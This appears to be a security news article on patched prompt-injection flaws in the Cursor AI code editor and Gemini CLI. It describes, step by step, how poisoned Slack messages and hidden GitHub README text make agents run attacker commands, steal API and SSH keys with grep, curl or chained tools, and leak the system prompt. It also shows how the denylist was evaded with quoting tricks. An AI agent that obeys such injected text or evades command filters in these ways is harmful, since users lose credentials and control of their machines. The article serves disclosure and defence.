The world of AI-assisted tools is rapidly evolving, bringing unprecedented efficiency and innovation. However, with great power comes great responsibility – and new attack surfaces for cybercriminals. Recently, the popular artificial intelligence (AI) code editor, Cursor, found itself in the spotlight as cybersecurity researchers disclosed a series of high-severity vulnerabilities that could have led to devastating consequences, including remote code execution.
These revelations serve as a stark reminder that as AI agents increasingly bridge external, internal, and interactive worlds, our security models must adapt to assume external context may influence agent runtime, and every interaction must be meticulously monitored.
CVE-2025-54135: The CurXecute Flaw
Aim Labs, the team behind the previously disclosed EchoLeak, uncovered a critical vulnerability in Cursor, tracked as CVE-2025-54135 (CVSS score: 8.6), which they've codenamed "CurXecute." This flaw, now patched in version 1.3 released on July 29, 2025, leveraged the fact that Cursor operates with developer-level privileges.
The core of the issue lay in Cursor's Model Control Protocol (MCP) servers, which facilitate interaction with external systems like databases and APIs. By feeding "poisoned data" to the agent via MCP, an attacker could gain full remote code execution under the user's privileges. This opened the door to a terrifying array of malicious activities, including ransomware, data theft, and even AI manipulation and hallucinations.
The attack was surprisingly simple: a single, externally-hosted prompt injection could silently rewrite the ~/.cursor/mcp.json file, executing attacker-controlled commands. This mirrored the EchoLeak vulnerability, highlighting a recurring theme of untrusted data poisoning agent behavior.
Auto-Run Mode: A Dangerous Default
Aim Security specifically pointed out a critical misstep: the mcp.json file, used to configure custom MCP servers, would automatically trigger the execution of any new entry without requiring user confirmation. This "auto-run mode" became a dangerous conduit for malicious payloads.
Imagine this scenario:
- A user adds a Slack MCP server via the Cursor UI.
- An attacker posts a specially crafted message in a public Slack channel containing a command injection payload.
- The victim, innocently asking Cursor's agent to summarize messages using the new Slack MCP server ("Use Slack tools to summarize my messages"), encounters the poisoned message.
Even if the user later rejected the edit, the malicious code had already executed.
The "simplicity" of this attack is what makes it so concerning, underscoring how AI-assisted tools, when processing external content, can unintentionally open up new and unforeseen attack surfaces.
Beyond the Denylist: The Need for Allowlist Protections
Version 1.3 of Cursor also addressed another significant weakness: the platform's denylist-based protections were easily circumvented. Attackers could employ methods like Base64-encoding, shell scripts, or enclosing shell commands within quotes (e.g., "e"cho bypass) to execute unsafe commands.
Following responsible disclosure by the BackSlash Research Team, Cursor wisely chose to deprecate the denylist feature altogether in favor of a more robust allowlist. This shift is crucial, as researchers Mustafa Naamneh and Micah Gold rightly emphasize: "Don't expect the built-in security solutions provided by vibe coding platforms to be comprehensive or foolproof. The onus is on end-user organizations to ensure agentic systems are equipped with proper guardrails."
Hidden Threats in GitHub READMEs and Tool Combinations
Adding to Cursor's woes, HiddenLayer independently discovered that Cursor's ineffective denylist could be weaponized by embedding hidden malicious instructions within a GitHub README.md file. This ingenious attack allowed an attacker to steal API keys, SSH credentials, and even run blocked system commands.
Consider this: A victim views a project on GitHub where the prompt injection is subtly hidden. When they then ask Cursor to git clone the project and set it up, the prompt injection takes over the AI model. It forces Cursor to use the grep tool to find sensitive keys in the user's workspace, subsequently exfiltrating them with curl.
HiddenLayer also unearthed additional weaknesses, including the ability to leak Cursor's system prompt by overriding the base URL for OpenAI API requests, and even exfiltrate a user's private SSH keys. This was achieved through a "tool combination attack," leveraging seemingly benign tools like read_file and create_diagram. A prompt injection in a GitHub README.md file, parsed by Cursor when the user asked for a summary, would trigger the read_file tool to access SSH keys, and then the create_diagram tool to exfiltrate them to an attacker-controlled URL. All these issues have been remediated in Cursor version 1.3.
Lessons Learned: A Wider Industry Challenge
These vulnerabilities in Cursor are not isolated incidents. Tracebit recently devised a similar attack targeting Google's Gemini CLI, an open-source command-line tool for coding tasks. This attack exploited a default configuration to surreptitiously exfiltrate sensitive data. Like the Cursor attacks, it involved an attacker-created GitHub codebase with a malicious "indirect prompt injection" in the GEMINI.md context file, requiring the victim to add a benign command to an allowlist.
To mitigate this risk, Gemini CLI users are urged to upgrade to version 0.1.14, shipped on July 25, 2025.
The Path Forward: Proactive Security Measures
The spate of recent vulnerabilities in AI-assisted coding tools highlights a critical need for proactive and comprehensive security measures. As these tools become more integrated into our workflows and interact with external systems, the attack surface will only continue to expand.
For developers and organizations utilizing AI code editors and similar tools, the key takeaways are clear:
- Prompt Injection Awareness: Understand the risks of prompt injection and how untrusted external data can manipulate AI agents.
- Embrace Allowlists: Move away from denylist-based security, which is inherently less secure, and adopt allowlist models.
- Scrutinize External Interactions: Implement rigorous validation and monitoring of all interactions between AI agents and external systems.
- Regular Updates: Keep your AI tools and related software updated to the latest patched versions.
- User Education: Educate users about the potential dangers of interacting with untrusted or suspicious external content when using AI-assisted tools.
The future of AI in coding is bright, but it demands a heightened sense of security awareness and robust protective measures. By learning from these recent disclosures and implementing proactive strategies, we can harness the power of AI while safeguarding our systems from emerging threats.